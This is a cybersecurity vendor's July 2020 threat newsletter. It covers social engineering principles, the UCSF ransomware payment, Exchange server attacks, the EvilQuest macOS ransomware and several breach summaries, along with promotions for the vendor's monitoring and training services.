• Avantia Threat Update


Updated: Jul 8, 2020


How to protect your business from Social Engineering; Get your analysis of the State Of The Dark Web after Covid 19; the University Of California San Francisco pays Ransomware hackers US$1.14 million to salvage research; Microsoft: Patch your Exchange Servers, they are under attack; New EVLQUEST Ransomware discovered targeting MOC OS; REPORT: The more cybersecurity tools an enterprise deploys, the less effective their defenses are; Healthcare data breaches keep climbing; Twitter apologizes for its breach; Australian cyberattacks illustrate the importance of basic training and major breaches in AUSTRALIA, CANADA, UNITED KINGDOM & UNITED STATES.

Dark Web Top Threats

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Education & Research

Top Employee Count: 1-10



Cyber criminals have many tricks up their sleeves when it comes to compromising sensitive data. They don’t always rely on system vulnerabilities and sophisticated hacks. They’re just as likely to target the an organisation’s employees. The attack methods they use to do this are known as social engineering.

What is social engineering? Social engineering is a collective term for ways in which fraudsters manipulate people into performing certain actions. It’s generally used in an information security context to refer to the tactics crooks use to trick people into handing over sensitive information or exposing their devices to malware. This often comes in the form of phishing scams – messages that are supposedly from a legitimate sender that ask the recipient to download an attachment or follow a link that directs them to a bogus website. However, social engineering isn’t always malicious. For example, say you need someone to do you a favor, but you’re unsure that they’ll agree if you ask them apropos of nothing. You might grease the wheels by offering to do something for them first, making them feel obliged to say yes when you ask them to return the favor. That’s a form of social engineering. You’re performing an action that will compel the person to do something that will benefit you. Understanding social engineering in this context helps you see that social engineering isn’t simply an IT problem. It’s a vulnerability in the way we make decisions and perceive others – something we delve into more in the next section.

Why social engineering works Think of the human brain as a security network and its susceptibility to be fooled as a system vulnerability. That makes social engineering the exploit that fraudsters use to take advantage of that vulnerability. But instead of malware injection or credential stuffing, criminals use rhetorical devices – ways of speaking that persuade us to follow their direction. For an idea of how they do this, let’s take a look at Robert Cialdini’s six principles of persuasion:

1. Reciprocity

This is the notion that, when you do something for someone, they feel obliged to return the favor. Cialdini uses the example of a waiter or waitress in a restaurant giving you a small gift with your bill, such as a mint or a fortune cookie. This gesture has been proven to increase the tip customers use by as much as 14% – and when the item is implied to be a special reward (“For you nice people, here’s an extra mint”), the tip increases by 23%. Reciprocity can be particularly dangerous in a cyber security context because it shows how rarely we think about the motives behind supposedly generous acts – or, if we aware of them, how we stick to our social obligations anyway.

2. Scarcity

This principle states that people are likely to want something if they know there’s a finite supply. It works particularly well when the person or organisation providing the service announces a reduction, emphasising how scarce the service is. For example, when British Airways announced that it would be cutting back on its London–New York Concorde service due to a lack of customers, ticket sales jumped. Nothing about the service had changed, nor had the price dropped. British Airways hadn’t reinforced the benefits of flying by Concorde or announced that it would be stopping the service altogether. But what it did was imply that the service might not be available in the future. This technique can also be seen when organisations market their product as “while stocks last”. The aim is to create a sense of urgency, forcing people to act now for fear of missing out.

3. Authority

This is the concept that people are more trust experts in their fields – particularly when they can back up their expertise with evidence. Cialdini notes, for example, that we’re more likely to follow a medical professional’s advice if we’re aware of their credentials. By highlighting their expertise – whether that’s by displaying their qualifications on the wall, referring to themselves as ‘Doctor’ or listing their professional experience – they assure the patient that they are trustworthy.

4. Consistency

This principle exploits people’s unwillingness to be hypocritical. The social engineer nudges the victim into a seemingly harmless opinion or act, then uses that logic to force them into a larger, more consequential position. Cialdini cites the example of homeowners who had agreed to place a small postcard in the front windows of their homes that supported a Drive Safely campaign. A few weeks later, those people were far more likely to agree to erect a large, unsightly billboard in their gardens displaying the same message when compared to a neighbourhood that hadn’t first been asked to display postcards. In another example, a health centre found that patients were 18% less likely to miss an appointment if they were required to write down the details instead of a receptionist. The simple act of writing down the appointment details reinforced the fact that it was the patient’s obligation to turn up. This technique can also be seen in the likes of the sunk cost fallacy – in which someone continues to spend time, money or effort on a something because they don’t want to waste their investment or accept that they made a mistake. You see this error often in cyber crime. Once a scammer has someone on the hook, they will have a much easier time persuading the victim to comply with requests.

5. Liking

The fifth principle – that people are more likely to agree to something when asked by someone they like – is just as likely to occur accidentally as it is deliberately. After all, some people are simply likeable, and through no conscious effort on their part, they find that others are more willing to do them favors. But what makes a person likable? Cialdini says that there are three important factors: we like people who are similar to us, who pay us compliments and who cooperate towards mutual goals. Cialdini refers to a study in which a group of business students were almost twice as successful in a sales negotiation when they shared some personal information with the prospective investor and found something the two parties have in common before getting down to business. However, there’s another factor at play in this example. It’s not just that the students asked the right questions; it’s the way those questions were asked. Perhaps the most important thing that makes someone likable is if they appear genuine. People are generally good at spotting when someone is disingenuous, so it can be very hard to affect likability in face-to-face correspondence. But via email, we have the time to curate what we say – something that’s particularly true for scammers, who sometimes spend hours crafting templates for their emails.

6. Consensus

The final principle is consensus, which states that when people are unsure what to do, they follow the actions and behaviors of others. Cialdini uses the example of a study in which hotels tried to get guests to reuse towels and linens. It found that the most effective way of going that wasn’t to highlight the benefits of reusing towels (such as it being environmentally friendly) but to simply state that the majority of guests already do this. It at first seems incomprehensible that we’re more effectively persuaded by an argument that’s essentially ‘everyone else is doing it’ rather than being presented with evidence, but it aligns with a lot of our other actions. Consider the last time you were in an unfamiliar environment; did you not look at how others were acting and follow their lead? The principle of consensus demonstrates that people don’t need to be given a reason to comply with a request; rather, they can be influenced by pointing the actions of those around them.

Common social engineering attack techniques

Pretexting - This technique forms the context of social engineering scams, referring to the pretext – or false scenario – that scammers use to contact victims. In a typical social engineering scam, the pretext might be that there has been suspicious activity on your Netflix account or that you need to confirm your payment card details for an Amazon order.

Baiting - This is a specific type of phishing scam in which the scammers claim they have something beneficial for victims if they follow their instructions.Whereas the examples we listed above use fear as a motivator – ‘someone is trying to break into your account’, ‘your package won’t arrive’ – baiting relies on curiosity and desire.For example, a scam might direct the victim towards a website where they can supposedly download music, TV series or films. However, that website is designed to capture personal information or trick people into downloading infected files.Baiting has also been used in physical attacks, with scammers leaving infected USB drives lying around conspicuously, waiting for someone to pick them up thinking that there might be something interesting on them.

Quid pro quo - Similar to baiting, quid pro quo attacks claim to help the victim – usually by offering a service – in exchange for information. The difference is that these types of attacks are supposedly mutually beneficial. The prototypical quid pro quo attack was the Nigerian prince scam: the attacker has vast sums of money they need help transferring, and if you give them the cash to do this, you’ll be recompensed. Attacks have become more credible since then. For example, an attacker might phone up employees claiming to be from technical support. Eventually they’ll find someone who was genuinely waiting for assistance and allow the scammer to do whatever they want to their computer under the assumption that they are a colleague who is solving the issue.

Scareware - This attack is designed to trick people into buying unnecessary software. It begins with a pop-up ad – generally imitating a Windows error message or antivirus program – claiming that the victim’s computer has been infected with malware. Alongside the message, the ad will claim that you need to purchase or upgrade your software to fix the issue. Those that do end up installing bogus software that appears to scan your system but is in fact either doing nothing or installing malware.

Angling - This is a specific type of phishing in which scammers pose as customer representatives on social media. They create accounts that imitate an official brand and wait for someone to post a complaint about that organisation on Facebook or Twitter. The scammer will respond in one of two ways. They might link to an official complaint channel or offer the victim something by way of an apology, such as a discount on their next purchase. Both these approaches are designed to steal the victim’s personal information.

How to protect yourself from social engineering

There are many ways you can protect yourself from social engineering attacks. For example, you should:

Learn the most common techniques that criminals use in phishing attacks;

Implement two-factor authentication to secure your accounts; and

Ensure that your antivirus software is regularly updated.

Organisations that want to address the threat of social engineering should conduct regular staff awareness training and test employees’ susceptibility with a social engineering penetration test. With this service, experts will try to trick your employees into handing over sensitive information and monitor how they respond. Do they fall right into the trap right away? Do they recognise that it’s a scam and ignore it? Do they contact a senior colleague to warn them? With this information, along with a detailed report containing the findings guidance, you can pinpoint your security weaknesses and fix them before you’re targeted for real.


The world has changed in the wake of the COVID-19 pandemic – and so has the Dark Web.  Gain insight into the current climate of the post-pandemic Dark Web, see what threats are rising on the Dark Web now, and what we think you need to know to help your customers adjust their cybersecurity strategies. Get a snapshot of the facts that you and your clients can use, because 2020 has been a wild year everywhere, including on the Dark Web.



The University of California at San Francisco (UCSF) has admitted to paying a partial ransom demand of $1.14 million to recover files locked down by a ransomware infection. The university was struck on June 1, where malware was found in the UCSF School of Medicine's IT systems. Administrators quickly attempted to isolate the infection and ring-fence a number of systems that prevented the ransomware from traveling to the core UCSF network and causing further damage. While the school says the cyberattack did not affect "our patient care delivery operations, overall campus network, or COVID-19 work," UCSF servers used by the school of medicine were encrypted. Ransomware can be particularly destructive as once a system is compromised, content is encrypted and rendered inaccessible. Victims are then faced with a choice: potentially lose their files, or pay a ransom demand. Cyberattacker's will often include a time limit for a decision to be made to ramp up the pressure to pay. As shown in this case, blackmail demands can reach millions of dollars.  "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment," the university said in a statement. "We are continuing our investigation, but we do not currently believe patient medical records were exposed." It is not recommended that victims bow to ransom demands, as this furthers criminal enterprises. However, UCSF said it took the "difficult decision to pay some portion of the ransom" as some of the information stored on the servers is "important to some of the academic work we pursue as a university serving the public good." The Netwalker gang is believed to be responsible.  The BBC was able to follow the negotiation, made in the Dark Web, between Netwalker and the university. The threat actors first demanded $3 million which was countered by the UCSF with a $780,000 offer, together with a plea that the novel coronavirus pandemic had been "financially devastating" to the academic institution. This offer, however, was dismissed, and a back-and-forth eventually led to the agreed figure of $1,140,895, made in Bitcoin (BTC).  In return for payment, the threat actors provided a decryption tool and said they would delete data stolen from the servers.  SophosLabs says the Netwalker toolkit is extensive and includes the Netwalker, Zeppelin, and Smaug ransomware, Windows-based reconnaissance tools, and brute-force credential software. The researchers say this group tends to focus on large organizations rather than individual targets. In past attacks, Netwalker has targeted systems through well-known and public vulnerabilities or via credential stuffing on machines with remote desktop services enabled.  UCSF pulled in cybersecurity consultants to investigate the incident and is currently working with the FBI. At the time of writing, servers are still down.  "We continue to cooperate with law enforcement, and we appreciate everyone's understanding that we are limited in what we can share while we continue with our investigation," the university added.


Microsoft is warning organizations that use Exchange email servers to shore up their systems now after observing a massive spike in highly skillful attacks this April.  The company's alert details how advanced cyber attackers are using freely available open-source software and a known, critical vulnerability to attack Exchange email servers – one of the most valuable sources of information in any organization. Exchange has been under attack for months now by multiple government-backed hackers who quickly pounced on a particularly nasty Exchange security flaw (CVE-2020-0688) shortly after Microsoft offered patches in February.  The flaw meant all Exchange email servers released in the past decade used identical cryptographic keys for the control panel's backend, which allowed remote attackers to run malware on it and take full control of the server to gain access to a target's email store.  But many organizations ignored Microsoft's warning to patch the Exchange bug, which it predicted would come under attack in the near future. By April, security researchers warned that over 350,000 Exchange servers with the vulnerability were exposed on the internet.   "Drop everything and patch this vulnerability immediately," Jonathan Cran, head of research at Kenna Security, warned at the time. Despite the disruption to the overall economy and most industries in the wake of COVID-19 pandemic, there are sections of IT that are booming. Microsoft says the most common way Exchange servers are compromised is via phishing attacks or attacks on desktop flaws and from there moving within the organization to access an Exchange server – the main system housing a target's email communications. But in April it saw a rise in attacks exploiting a particular remote code execution vulnerability affecting Microsoft's Internet Information Service (IIS) component of a target Exchange server.  "The first scenario is more common, but we're seeing a rise in attacks of the second variety; specifically, attacks that exploit Exchange vulnerabilities like CVE-2020-0688," said Hardik Suri of the Microsoft Defender ATP Research Team.  "The security update that fixes this vulnerability has been available for several months, but, notably, to this day, attackers find vulnerable servers to target. "In many cases, after attackers gain access to an Exchange server, what follows is the deployment of web shell into one of the many web accessible paths on the server."   Microsoft's new warning comes a week after the Australian government raised an alarm over ongoing attacks against organizations in the country.  The Australian Cyber Security Centre's (ACSC) lengthy advisory doesn't highlight CVE-2020-0688, but it does detail similar techniques to the ones Microsoft describes for attacks on IIS and Exchange email servers.  In both cases, the attackers planted web shell backdoor code on internet-accessible parts of Exchange, such as the log-on page for Outlook on the web, formerly Outlook Web Access. 

According to Microsoft, there were multiple concurrent campaigns behind the surge in Exchange attacks during April, with most employing web shells on internet-facing Exchange servers for initial access. The attackers used multiple web shells, but the most widely used was the China Chopper web shell.   "The telemetry showed attackers operating on on-premises Exchange servers using deployed web shells," says Suri.  "Whenever attackers interacted with the web shell, the hijacked application pool ran the command on behalf of the attacker, generating an interesting process chain.  "Common services, for example, Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC, formerly known as the Exchange Control Panel or ECP), executing net.exe, cmd.exe, and other known living-off-the-land binaries (LOLBins) like mshta.exe are very suspicious and should be further investigated," warned Suri. After deploying a web shell, the attackers explored the target domain and, where a misconfigured server was found, they added new accounts to high-privilege groups like Administrators, Remote Desktop Users, and Enterprise Admins.  This gave attackers "unrestricted access to any users or group in the organization". Afterwards, credentials to these accounts were targeted using native Windows tools to dump Local Security Authority Subsystem Service (LSASS) memory – a key service for handling authentication in Active Directory domains – and upload them to a remote server for cracking.   To gain persistence on a machine purely in memory, or without ever touching a disk, the attackers turned to open-source software. On systems configured to detect the open-source credential dumping tool, Mimikatz, the attackers used a modified version placed in a wrapper written in the Go programming language.  "The binary used the open-source MemoryModule library to load the binary using reflective DLL injection. Thus, the payload never touched the disk and was present only in memory, achieving a fileless persistence," notes Suri.  The attackers also attempted to disable Microsoft Defender Antivirus and disable archive scanning to protect .zip files and compression tools like rar.exe, which was used to steal email .pst files and memory dumps.      Suri recommends that organizations apply available updates, enable multi-factor authentication, and ensure on Windows 10 machines that tamper protection is enabled to prevent attackers disabling antivirus.  He also suggested organizations review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Security teams should also practice the principle of least-privilege and prioritize alerts indicating suspicious activities on Exchange servers.


EvilQuest ransomware encrypts macOS systems but also installs a keylogger and a reverse shell for full control over infected hosts. Named OSX.EvilQuest, this ransomware is different from previous macOS ransomware threats because besides encrypting the victim's files, EvilQuest also installs a keylogger, a reverse shell, and steals cryptocurrency wallet-related files from infected hosts. "Armed with these capabilities, the attacker can main full control over an infected host," said Patrick Wardle, Principal Security Researcher at Jamf. This means that even if victims paid, the attacker would still have access to their computer and continue to steal files and keyboard strokes.

Wardle is currently one of the many macOS security researchers who are analyzing this new threat. Others who are also investigating EvilQuest include Thomas Reed, Director of Mac & Mobile at Malwarebytes, and Phil Stokes, macOS security researcher at SentinelOne. Reed and Stokes are currently looking for a weakness or bug in the ransomware's encryption scheme that could be exploited to create a decryptor and help infected victims recover their files without paying the ransom. The researcher who first spotted the new EvilQuest ransomware is K7 Lab security researcher Dinesh Devadoss. Devadoss tweeted about his finding on June 29. However, new evidence surfaced in the meantime has revealed that EvilQuest has been, in reality, distributed in the wild since the start of June 2020. Reed said that Malwarebytes has found EvilQuest hidden inside pirated macOS software uploaded on torrent portals and online forums. Devadoos has spotted EvilQuest hidden in a software package called Google Software Update, Wardle has found samples of EvilQuest inside a pirated version of popular DJ software Mixed In Key, and Reed has spotted it hidden inside the macOS security tool called Little Snitch. However, Reed told us he believes the ransomware is most likely more broadly distributed, leveraging many more other apps, and not just these three. Wardle, who published an in-depth technical analysis of EvilQuest earlier, said the malware is pretty straightforward, as it moves to encrypt the user's files as soon as it's executed. Once the file encryption scheme ends, a popup is shown to the user, letting the victim know they've been infected and their files encrypted. The victim is directed to open a ransom note in the form of a text file that has been placed on their desktop. Stokes said that the ransomware will encrypt any files with the following file extensions:

.pdf, .doc, .jpg, .txt, .pages, .pem, .cer, .crt, .php, .py, .h, .m, .hpp, .cpp, .cs, .pl, .p, .p3, .html, .webarchive, .zip, .xsl, .xslx, .docx, .ppt, .pptx, .keynote, .js, .sqlite3, .wallet, .dat After the encryption process ends, the ransomware installs a keylogger to record all the user's keystrokes, a reverse shell so the attacker can connect to the infected host and run custom commands, and will also look to steal the following types of files, usually employed by cryptocurrency wallet applications.

"wallet.pdf" "wallet.png" "key.png" "*.p12" In his own analysis of EvilQuest, Reed also noted that the ransomware also attempts to modify files specific to Google Chrome's update mechanism, and use the files as a form of persistence on infected hosts. "These [Chrome update] files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed," Reed said. "However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it's unclear what the purpose here is." Wardle, who has created several open-source macOS security tools, said that a tool he released in 2016, named RansomWhere, can detect and stop EvilQuest from running. Reed also said that Malwarebytes for Mac was also updated to detect and stop this ransomware before it does any damage. EvilQuest is the third ransomware strain that has exclusively targeted macOS users after KeRanger and Patcher. Another macOS ransomware strain called Mabouia only existed at a theoretical level and was never released in the real world.


New research highlights how throwing money indiscriminately at security doesn’t guarantee results. The enterprise is slowly improving its response to cybersecurity incidents, but in the same breath, it is still investing in too many tools that can actually reduce the effectiveness of defense. 

Recently, IBM released the results of a global survey, conducted by the Ponemon Institute and featuring responses from over 3,400 security and IT staff worldwide. The research suggests that while investment and planning are on the uptake, effectiveness is not on the same incline, with response efforts hindered by complexity caused by fragmented toolsets. The research, IBM's fifth annual Cyber Resilient Organization Report, says that while organizations are improving in cyberattack planning, detection, and response, their ability to contain an active threat has declined by 13%.  On average, enterprises deploy 45 cybersecurity-related tools on their networks. The widespread use of too many tools may contribute to an inability not only to detect, but also to defend from active attacks. Enterprises that deploy over 50 tools ranked themselves 8% lower in their ability to detect threats, and 7% lower in their defensive capabilities, than other companies employing fewer toolsets.  It does appear that the enterprise cybersecurity scene is reaching a new level of maturity, however, with 26% of respondents saying that their organizations have now adopted formal, company-wide Cyber Security Incident Response Plans (CSIRPs), an increase from 18% five years ago. In total, however, 74% of respondents said their cybersecurity planning posture still leaves much to be desired, with no plans, ad-hoc plans, or inconsistency still a thorn in the side of IT staff. In addition, among those who have adopted a response plan, only a third have created a playbook for common attack types to watch out for during daily operations.  "Since different breeds of attack require unique response techniques, having pre-defined playbooks provides organizations with consistent and repeatable action plans for the most common attacks they are likely to face," the report notes.  According to IBM, a lack of planning and incident response testing can lead to a damages bill up to $1.2 million higher than a cyberattack would have otherwise cost a victim company.  The cost can be high in terms of disruption, too, as only 39% of enterprise companies with CSIRP (Computer Security Incident Response Plan) applied have experienced a severely disruptive attack in the past two years -- in comparison to 62% of those which did not implement any form of plan.  In light of the COVID-19 pandemic and the rapid changes many of us have experienced in our workplaces, CSIRP setups need to be reviewed, and if need be, changed to adapt to the working from home environment. However, only 7% of respondents review these plans quarterly, and 40% have no time period set whatsoever for reviews.  "With business operations changing rapidly due to an increasingly remote workforce, and new attack techniques constantly being introduced, this data suggests that many businesses are relying on outdated response plans which don't reflect the current threat and business landscape," IBM added. 



Exploit: Accidental Data Sharing

Twitter: Social Media Platform 

Risk to Small Business: 2.602 = Moderate - Twitter sent a notification to business clients last week acknowledging a data breach that exposed the personal and billing information of some users. The breach occurred due to an issue that led to some users’ sensitive information being stored in the browser’s cache. Twitter explained that it recently became aware of this issue. Business users were warned that prior to May 20, 2020, if you viewed your billing information on ads.twitter or analytics.twitter your account’s billing information may be at risk.

Individual Risk: 2.602 = Moderate - Twitter did not release an estimate of the accounts affected, but it did specify that only business customers were at risk, and only a percentage of business customers had any details exposed. The leaked information potentially included email addresses, users’ contact numbers, and the last four digits of credit card numbers used for Ads accounts. Twitter business customers should monitor potentially affected payment accounts.

Customers Impacted: Unknown

Effect On Customers: Information like this quickly makes its way to the Dark Web, setting businesses up for cyberattacks including spear phishing attempts. In addition, failing to guard a business customer’s recurring payment information can negatively impact their relationship with that service provider.

Cybersecurity Risk Levels 1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent, ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit:


Exploit: Internal Email Account Compromise 

AMT Healthcare: Medical Care Solutions Provider 

Risk to Small Business: 1.662 = Severe - AMT Healthcare revealed this week that it had experienced a data breach affecting a large pool of customers in December 2019 that was discovered through suspicious activity on an employee email account. The California-based company recently completed an investigation into the incident and contacted those who were affected. Potentially compromised data includes patient names, Social Security numbers, medical record numbers, diagnosis information, health insurance policy information, medical history information, and driver’s license/state identification numbers.

Individual Risk: 1.899 = Severe - Anyone that may be at risk of compromise was informed this week. Extremely sensitive data was compromised in this breach, and those affected should beware of the potential for fraud, identity theft, and spear phishing attempts that this stolen data creates. A filing of the account posted to the breach portal at the U.S. Department of Health and Human Services noted that potentially affected patients are being offered free credit monitoring services.  Customers Impacted: 47,767 

Effect On Customers: When clients choose to do sensitive business with a company, they’re also trusting that company to guard their information. This imperative is even stronger for companies that collect health information. Not only does a data breach cost healthcare organizations patient confidence, but it also costs a fortune in HIPPA-related fines. 

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: CentralSquare Technologies - UNITED STATES

Exploit: Malware 

CentralSquare Technologies: Public Sector Services Provider

Risk to Small Business: 1.977 = Severe- Eight cities in three U.S. states that use CentralSquare’s Click2Gov payment systems for municipal transactions were recently affected by a payment card skimming attack that exploited a software vulnerability in the Click2Gov platform. Using Magecart-style malware designed specifically to work on Click2Gov payment sites, cybercriminals were able to capture payment card information from people using the affected Click2Gov sites to make municipal services transactions like paying bills or fines. The attacks began in April 2020 and are ongoing. Reports note that 5 of the 8 cities affected were also targeted in attacks in 2019. The names of the affected cities were not released.  

Individual Risk: 2.378 = Severe - Financial data was directly compromised in this attack, including payment card numbers, expiration dates, and CVV. Similar information from previous attacks against Click2Gov in 2019 and 2018 was made available on the Dark Web quickly. 

Customers Impacted: Unknown

Effect On Customers: Payment skimming malware is an increasing threat for any business that processes online payments. Compromised financial and identity information can also hang around in Dark Web markets for a long time, creating continued risk.  

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: University of California San Francisco - UNITED STATES

Exploit: Ransomware 

University of California San Francisco: Education and Research Institution 

Risk to Small Business: 1.275 = Extreme - The University of California San Francisco (UCSF) confirmed this week that it paid cybercriminals $1.14 million to decrypt data following a ransomware attack. Although UCSF was able to detect the incident quickly, it was not fast enough to allow cybersecurity teams to quarantine the affected servers, and a significant portion of its medical school and research data was encrypted. The ransom was demanded to free essential COVID-19 research data that was captured in an intrusion on June 1. Reports indicate that UCSF was one of four academic institutions targeted in a single week by the Netwalker ransomware group.  

Individual Risk: No patient or personal data was reported as compromised at this time. 

Customers Impacted: Unknown

Effect On Customers: Ransomware is a growing menace to every organization, and it’s not just sensitive business or financial data that Dark Web criminals are after. Research data has become an increasingly hot commodity. Paying ransoms to cybercriminals to decrypt research data sets a dangerous precedent. Collecting large sums will embolden other groups that can take down big fish to score big paydays.  

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: OneClass Learning - CANADA

Exploit: Unsecured Database Access 

OneClass: E-learning Platform 

Risk to Small Business: 1.407 = Extreme - An unsecured Amazon Secure Storage Services bucket is the culprit for a data breach at North American education services provider OneClass. The Canadian company was informed of the breach on May 25 by cybersecurity researchers and the database was secured within 24 hours. However, personally identifiable information for more than 1 million students, some as young as 13, had already been extracted.  The compromised 27GB database includes 8.9 million records.  

Individual Risk: 1.719 = Severe - Students, teachers, and other users of the platform had personally identifiable data including full names, email addresses (some masked), schools and universities attended, phone numbers, course enrollment data, textbooks, testing results, faculty data, and other OneClass account details compromised. No payment information or financial data is believed to have been affected.  

Customers Impacted: 1 million

Effect On Customers: Failure to secure the personally identifiable data of users, especially children, is distasteful to both potential and current clients. Students, teachers, and schools may look at other education platforms to find a more secure alternative. Information compromised in this incident could haunt those affected for years to come as it lingers on the Dark Web. 

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711


Exploit: Accidental Data Sharing  

Babylon Health: Telemedicine Technology Developer 

Risk to Small Business: 2.207 = Sever - A recently completed investigation revealed that a flaw in the software created by Babylon Health to enable telemedicine appointments also allowed users to see the consultations of other patients after they finished their own telemedicine visits. The app is used by about 2.3 million UK users. It allows members to book medical appointments, access a triage chatbot, and have consultations with NHS doctors via smartphone video or audio-only call. Apparently, when users switched from video to audio-only during their call, they also gained access to the audio recordings of the medical consultations of other users.

Individual Risk: 2.919 = Moderate - Babylon Health reports that the issue was discovered in early June and repaired rapidly, with a “very small” unspecified number of users affected. 

Customers Impacted: Unknown

Effect On Customers: More and more interactions are taking place over video these days, especially in the wake of the global pandemic. Many video conferencing service providers have had issues with intrusions and software glitches that put the private conversations and meetings of users at risk, creating doubt in the security of this type of communication. Because of this, data that is shared during a video conference through display, audio, or screen sharing may be in danger of compromise.

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SME’s to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote access, independent, ‘real time’ audit of our clients critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

Its the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit:

THREAT FOCUS: Chem Pack Formulations - AUSTRALIA

Exploit: Ransomware

Chem Pack: Liquid Chemical Formulation Manufacturer 

Risk to Small Business: 1.779 = Severe - As a barrage of cyberattacks continues to affect companies in Australia, Chem Pack has been caught in a ransomware attack. Cybercriminals using REvil ransomware have compromised and encrypted data at the Melbourne-based manufacturer. REvil ransomware exploits a known 2018 Windows vulnerability to elevate account privileges, enabling these bad actors to strike. The attackers claim to have exfiltrated financial information, personal information, and other essential business data, and recently posted a screenshot of a sample of the data on a Dark Web forum. Typically, this group posts a screenshot as proof that they’ve encrypted the affected data and asks the victim to contact them to negotiate a ransom for the key to unlock it. 

Individual Risk: No individual data was reported as compromised.

Customers Impacted: Unknown

Effect On Customers: Ransomware is a scourge that doesn’t just hold a company’s operations hostage, it also creates extended cybersecurity risks as data that has been obtained in attacks is copied and shared on the Dark Web. Even when a ransom is paid, victims have no guarantee that the captured data is returned without being replicated or sold to others first.   Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711



Australian Cyberattacks Prove That Threat Resistance Training is Always a Good Investment 

Sophisticated cyberattack risks are growing throughout the world, and the attacker isn’t always just a group of opportunistic cybercriminals. A recent explosion of cyberattacks against targets in Australia has been reported to be linked to potentially malicious state-sponsored actors, creating a new level of worry for cybersecurity architects. Ransomware has become an even greater menace for Australian companies. Government officials have warned that ransomware that is delivered through spear phishing attacks is suspected to be part of the overall larger attack picture in this wave of attacks. Therefore, it’s clear that frequent, high-quality phishing defense and resistance training is essential to protect a company from ransomware attacks.  Ransomware is devastating to any business, as was recently demonstrated by two incidents at Australian drinks conglomerate Lion. Systems at the beverage company have been infected twice in the last month alone, freezing essential production and operations technology just as it began to ramp up its post-pandemic production.   Get tips to help secure a remote workforce fast and insight into the unexpected risks that remote operations bring in our Remote Working Cybersecurity resource package.  A dynamic solution like  BullPhish ID is the right choice for state-of-the-art phishing resistance training. BullPhish ID’s constantly updated educational tools allow staffers to learn through video and be tested on that knowledge with online quizzes – with pre-made phishing kits including the latest threats available in 8 languages for quick deployment. These features also make it an ideal vehicle for remote training because training shouldn’t stop just because staffers aren’t in the office.   Updating a company’s cybersecurity stack to boost ransomware defense should always include upgrading phishing resistance training. Dark Web monitoring is a great place to start when constructing a strong cybersecurity defense, but every building block in that defense is important – and improved phishing resistance with BullPhish ID is an easy and affordable block to add.

An Ounce of Prevention is Worth a Pound of Cure 

